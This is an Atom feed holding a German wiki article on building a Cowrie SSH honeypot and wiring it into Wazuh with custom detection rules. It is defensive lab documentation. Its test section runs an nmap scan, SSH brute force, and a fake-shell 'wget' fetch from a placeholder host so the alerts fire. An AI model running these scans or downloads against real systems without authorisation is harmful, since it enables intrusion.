<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Wazuh_Honeypot_Beispiel</id>
	<title>Wazuh Honeypot Beispiel - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Wazuh_Honeypot_Beispiel"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Wazuh_Honeypot_Beispiel&amp;action=history"/>
	<updated>2026-07-06T05:58:29Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Wazuh_Honeypot_Beispiel&amp;diff=71529&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „Dieser Artikel beschreibt den Aufbau eines '''Cowrie'''-SSH-Honeypots als eigene VM und dessen Anbindung an den Wazuh-Manager. Cowrie setzt dem Angreifer eine…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Wazuh_Honeypot_Beispiel&amp;diff=71529&amp;oldid=prev"/>
		<updated>2026-06-28T18:32:06Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „Dieser Artikel beschreibt den Aufbau eines &amp;#039;&amp;#039;&amp;#039;Cowrie&amp;#039;&amp;#039;&amp;#039;-SSH-Honeypots als eigene VM und dessen Anbindung an den Wazuh-Manager. Cowrie setzt dem Angreifer eine…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Dieser Artikel beschreibt den Aufbau eines '''Cowrie'''-SSH-Honeypots als eigene VM und dessen Anbindung an den Wazuh-Manager. Cowrie setzt dem Angreifer eine gefälschte Shell vor und protokolliert jeden Login-Versuch und jeden eingegebenen Befehl. Da es keinen legitimen Grund gibt, den Honeypot anzufassen, ist '''jede''' Interaktion ein hochwertiger, false-positive-freier Alarm.&lt;br /&gt;
&lt;br /&gt;
== Platzierung ==&lt;br /&gt;
&lt;br /&gt;
Der Honeypot ist ein '''eigener Endpoint''' – nicht auf dem IDS und nicht auf dem Wazuh-Manager:&lt;br /&gt;
&lt;br /&gt;
;Nicht auf dem IDS&lt;br /&gt;
* Der Suricata-Sensor hängt passiv (receive-only) am OVS-Mirror-Port. Dort lässt sich kein Dienst anbieten, zu dem ein Angreifer eine Verbindung aufbaut.&lt;br /&gt;
&lt;br /&gt;
;Nicht auf dem Manager&lt;br /&gt;
* Das SOC-Hirn terminiert niemals freiwillig Angreifer-Traffic. Der Manager analysiert, er ködert nicht.&lt;br /&gt;
&lt;br /&gt;
;Richtig: dedizierte VM mit plausibler, ungenutzter IP in einem gemirrorten VLAN&lt;br /&gt;
* Beispiel: ein vermeintlicher „DB-Server&amp;quot; &amp;lt;code&amp;gt;db-prod-01&amp;lt;/code&amp;gt; auf &amp;lt;code&amp;gt;172.26.52.30&amp;lt;/code&amp;gt; in VLAN 22 (anpassen).&lt;br /&gt;
* Schöner Nebeneffekt: Ein Scan, der den Honeypot trifft, läuft am East-West-Sensor vorbei ''und'' terminiert auf dem Honeypot. Damit feuern beide Ketten – die Portscan-Regel (100210) und die Cowrie-Login-Regel. Doppelte Bestätigung aus zwei Quellen.&lt;br /&gt;
&lt;br /&gt;
== Basis-VM ==&lt;br /&gt;
&lt;br /&gt;
;Debian-Template verwenden (Rocky ginge auch – dann SELinux beachten und Python ggf. via AppStream nachziehen)&lt;br /&gt;
* Minimal-Installation, nur SSH und der Wazuh-Agent. Keine weiteren Dienste – kleine Angriffsfläche.&lt;br /&gt;
&lt;br /&gt;
== Cowrie installieren ==&lt;br /&gt;
&lt;br /&gt;
;Abhängigkeiten&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt install -y git python3-venv python3-dev libssl-dev libffi-dev build-essential&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Eigenen, rechtearmen Benutzer anlegen (Cowrie läuft nie als root)&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;adduser --disabled-password --gecos &amp;quot;&amp;quot; cowrie&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Als cowrie das Repo holen und venv aufsetzen&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;su - cowrie&lt;br /&gt;
git clone https://github.com/cowrie/cowrie&lt;br /&gt;
cd cowrie&lt;br /&gt;
python3 -m venv cowrie-env&lt;br /&gt;
source cowrie-env/bin/activate&lt;br /&gt;
pip install --upgrade pip&lt;br /&gt;
pip install -r requirements.txt&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Konfiguration ==&lt;br /&gt;
&lt;br /&gt;
;Konfig-Vorlage kopieren – Datei &amp;lt;code&amp;gt;/home/cowrie/cowrie/etc/cowrie.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;cp etc/cowrie.cfg.dist etc/cowrie.cfg&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Hostname plausibel setzen, damit die Falle echt wirkt&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[honeypot]&lt;br /&gt;
hostname = db-prod-01&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;JSON-Log ist standardmäßig aktiv und landet unter&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;text&amp;quot;&amp;gt;/home/cowrie/cowrie/var/log/cowrie/cowrie.json&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Optional: Zugangsdaten steuern, mit denen der „Login&amp;quot; gelingt – Datei &amp;lt;code&amp;gt;etc/userdb.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Benutzer:Trennzeichen:Passwort  (! = verboten, * = beliebig)&lt;br /&gt;
root:x:!root&lt;br /&gt;
root:x:!123456&lt;br /&gt;
root:x:*&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Damit scheitern die ersten Versuche und der Angreifer kommt erst nach etwas Bruteforce „rein&amp;quot; – realistischer und didaktisch schöner.&lt;br /&gt;
&lt;br /&gt;
== Echten SSH-Zugang verschieben + Port-Umleitung ==&lt;br /&gt;
&lt;br /&gt;
Cowrie lauscht aus Sicherheitsgründen auf '''2222'''. Damit der Angreifer den Standardport 22 trifft, wird 22 → 2222 umgeleitet. Vorher den ''echten'' Admin-SSH wegräumen, sonst sperrst du dich aus.&lt;br /&gt;
&lt;br /&gt;
;Admin-sshd auf einen anderen Port legen – Datei &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Port 2299&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;systemctl restart ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
Port 2299 per Firewall nur fürs Management-Netz freigeben.&lt;br /&gt;
&lt;br /&gt;
;Umleitung 22 → 2222 (Debian Trixie = nftables)&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;nft add table ip nat&lt;br /&gt;
nft add chain ip nat prerouting '{ type nat hook prerouting priority -100 ; }'&lt;br /&gt;
nft add rule ip nat prerouting tcp dport 22 redirect to :2222&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cowrie starten (systemd) ==&lt;br /&gt;
&lt;br /&gt;
;Unit anlegen – Datei &amp;lt;code&amp;gt;/etc/systemd/system/cowrie.service&amp;lt;/code&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;ini&amp;quot;&amp;gt;&lt;br /&gt;
[Unit]&lt;br /&gt;
Description=Cowrie SSH Honeypot&lt;br /&gt;
After=network.target&lt;br /&gt;
&lt;br /&gt;
[Service]&lt;br /&gt;
Type=forking&lt;br /&gt;
User=cowrie&lt;br /&gt;
Group=cowrie&lt;br /&gt;
ExecStart=/home/cowrie/cowrie/bin/cowrie start&lt;br /&gt;
ExecStop=/home/cowrie/cowrie/bin/cowrie stop&lt;br /&gt;
PIDFile=/home/cowrie/cowrie/var/run/cowrie.pid&lt;br /&gt;
Restart=on-failure&lt;br /&gt;
&lt;br /&gt;
[Install]&lt;br /&gt;
WantedBy=multi-user.target&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Aktivieren und starten&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;systemctl daemon-reload&lt;br /&gt;
systemctl enable --now cowrie&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Wazuh-Agent anbinden ==&lt;br /&gt;
&lt;br /&gt;
Der Agent wird wie bei den übrigen Endpoints am Manager (&amp;lt;code&amp;gt;172.26.54.11&amp;lt;/code&amp;gt;) registriert. Anschließend die &amp;lt;code&amp;gt;cowrie.json&amp;lt;/code&amp;gt; als Logquelle ergänzen.&lt;br /&gt;
&lt;br /&gt;
;Datei &amp;lt;code&amp;gt;/var/ossec/etc/ossec.conf&amp;lt;/code&amp;gt; – Achtung: nur '''ein''' &amp;lt;code&amp;gt;&amp;lt;ossec_config&amp;gt;&amp;lt;/code&amp;gt;-Block, alle &amp;lt;code&amp;gt;&amp;lt;localfile&amp;gt;&amp;lt;/code&amp;gt; da hinein&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;xml&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;localfile&amp;gt;&lt;br /&gt;
  &amp;lt;log_format&amp;gt;json&amp;lt;/log_format&amp;gt;&lt;br /&gt;
  &amp;lt;location&amp;gt;/home/cowrie/cowrie/var/log/cowrie/cowrie.json&amp;lt;/location&amp;gt;&lt;br /&gt;
&amp;lt;/localfile&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Agent neu starten&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;systemctl restart wazuh-agent&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cowrie schreibt zeilenweises JSON – der mitgelieferte JSON-Decoder von Wazuh zerlegt das automatisch in dynamische Felder (&amp;lt;code&amp;gt;eventid&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;src_ip&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;input&amp;lt;/code&amp;gt; …). Ein eigener Decoder ist nicht nötig.&lt;br /&gt;
&lt;br /&gt;
== Wazuh-Regeln ==&lt;br /&gt;
&lt;br /&gt;
;Datei &amp;lt;code&amp;gt;/var/ossec/etc/rules/local_rules.xml&amp;lt;/code&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;xml&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;group name=&amp;quot;local,honeypot,cowrie,&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Basis: neue Session auf dem Honeypot --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100300&amp;quot; level=&amp;quot;6&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;decoded_as&amp;gt;json&amp;lt;/decoded_as&amp;gt;&lt;br /&gt;
    &amp;lt;field name=&amp;quot;eventid&amp;quot;&amp;gt;cowrie.session.connect&amp;lt;/field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: neue SSH-Session von $(src_ip)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1190&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;recon,honeypot,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Fehlgeschlagener Login-Versuch --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100301&amp;quot; level=&amp;quot;8&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;if_sid&amp;gt;100300&amp;lt;/if_sid&amp;gt;&lt;br /&gt;
    &amp;lt;field name=&amp;quot;eventid&amp;quot;&amp;gt;cowrie.login.failed&amp;lt;/field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: Login-Versuch fehlgeschlagen ($(username)/$(password)) von $(src_ip)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1110&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;authentication_failed,honeypot,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Bruteforce: viele Fehlversuche von gleicher Quelle --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100302&amp;quot; level=&amp;quot;10&amp;quot; frequency=&amp;quot;5&amp;quot; timeframe=&amp;quot;60&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;if_matched_sid&amp;gt;100301&amp;lt;/if_matched_sid&amp;gt;&lt;br /&gt;
    &amp;lt;same_field&amp;gt;src_ip&amp;lt;/same_field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: SSH-Bruteforce von $(src_ip)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1110&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;authentication_failures,honeypot,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Angreifer ist drin: erfolgreicher Login --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100303&amp;quot; level=&amp;quot;12&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;if_sid&amp;gt;100300&amp;lt;/if_sid&amp;gt;&lt;br /&gt;
    &amp;lt;field name=&amp;quot;eventid&amp;quot;&amp;gt;cowrie.login.success&amp;lt;/field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: erfolgreicher Login von $(src_ip) als $(username)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1078&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;authentication_success,honeypot,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Jeder eingegebene Befehl in der Fake-Shell --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100304&amp;quot; level=&amp;quot;12&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;if_sid&amp;gt;100300&amp;lt;/if_sid&amp;gt;&lt;br /&gt;
    &amp;lt;field name=&amp;quot;eventid&amp;quot;&amp;gt;cowrie.command.input&amp;lt;/field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: Befehl ausgefuehrt von $(src_ip): $(input)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1059&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;honeypot,attack,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;!-- Datei nachgeladen (wget/curl in der Shell) --&amp;gt;&lt;br /&gt;
  &amp;lt;rule id=&amp;quot;100305&amp;quot; level=&amp;quot;13&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;if_sid&amp;gt;100300&amp;lt;/if_sid&amp;gt;&lt;br /&gt;
    &amp;lt;field name=&amp;quot;eventid&amp;quot;&amp;gt;cowrie.session.file_download&amp;lt;/field&amp;gt;&lt;br /&gt;
    &amp;lt;description&amp;gt;Honeypot: Datei nachgeladen von $(src_ip)&amp;lt;/description&amp;gt;&lt;br /&gt;
    &amp;lt;mitre&amp;gt;&lt;br /&gt;
      &amp;lt;id&amp;gt;T1105&amp;lt;/id&amp;gt;&lt;br /&gt;
    &amp;lt;/mitre&amp;gt;&lt;br /&gt;
    &amp;lt;group&amp;gt;honeypot,malware,&amp;lt;/group&amp;gt;&lt;br /&gt;
  &amp;lt;/rule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/group&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Manager neu starten&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;systemctl restart wazuh-manager&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Level bewusst hoch: Jeder Treffer ist per Definition bösartig – kein Tuning, keine False Positives.&lt;br /&gt;
&lt;br /&gt;
== PoC ==&lt;br /&gt;
&lt;br /&gt;
;Treffer live mitlesen (auf dem Manager)&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;tail -f /var/ossec/logs/alerts/alerts.json | grep -E '1003[0-9][0-9]'&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Von Kali: erst scannen (loest zusaetzlich Portscan-Regel 100210 aus)&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;nmap -sS -p- -T4 172.26.52.30&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Dann SSH-Bruteforce / Login auf den Honeypot&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;ssh root@172.26.52.30&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
* Falsche Passwörter → 100301, ab fünf in 60 s → 100302 (Bruteforce).&lt;br /&gt;
* Treffer aus der &amp;lt;code&amp;gt;userdb.txt&amp;lt;/code&amp;gt; → 100303 (erfolgreicher Login).&lt;br /&gt;
&lt;br /&gt;
;In der Fake-Shell Befehle absetzen&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;whoami; uname -a; wget http://example.test/x&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
* Jeder Befehl → 100304, der &amp;lt;code&amp;gt;wget&amp;lt;/code&amp;gt; zusätzlich → 100305.&lt;br /&gt;
&lt;br /&gt;
;Im Dashboard prüfen&lt;br /&gt;
* Security Events → Filter &amp;lt;code&amp;gt;rule.groups:honeypot&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Regel testen ohne Angriff ==&lt;br /&gt;
&lt;br /&gt;
;Eine echte Zeile aus der cowrie.json durch die Regel-Engine schicken&lt;br /&gt;
*&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;/var/ossec/bin/wazuh-logtest&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
Eine &amp;lt;code&amp;gt;cowrie.login.success&amp;lt;/code&amp;gt;- oder &amp;lt;code&amp;gt;cowrie.command.input&amp;lt;/code&amp;gt;-Zeile aus &amp;lt;code&amp;gt;var/log/cowrie/cowrie.json&amp;lt;/code&amp;gt; einfügen und prüfen, ob die passende 1003xx-Regel greift.&lt;br /&gt;
&lt;br /&gt;
[[Kategorie:Wazuh]]&lt;br /&gt;
[[Kategorie:Honeypot]]&lt;br /&gt;
[[Kategorie:Cowrie]]&lt;br /&gt;
[[Kategorie:SOC]]&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>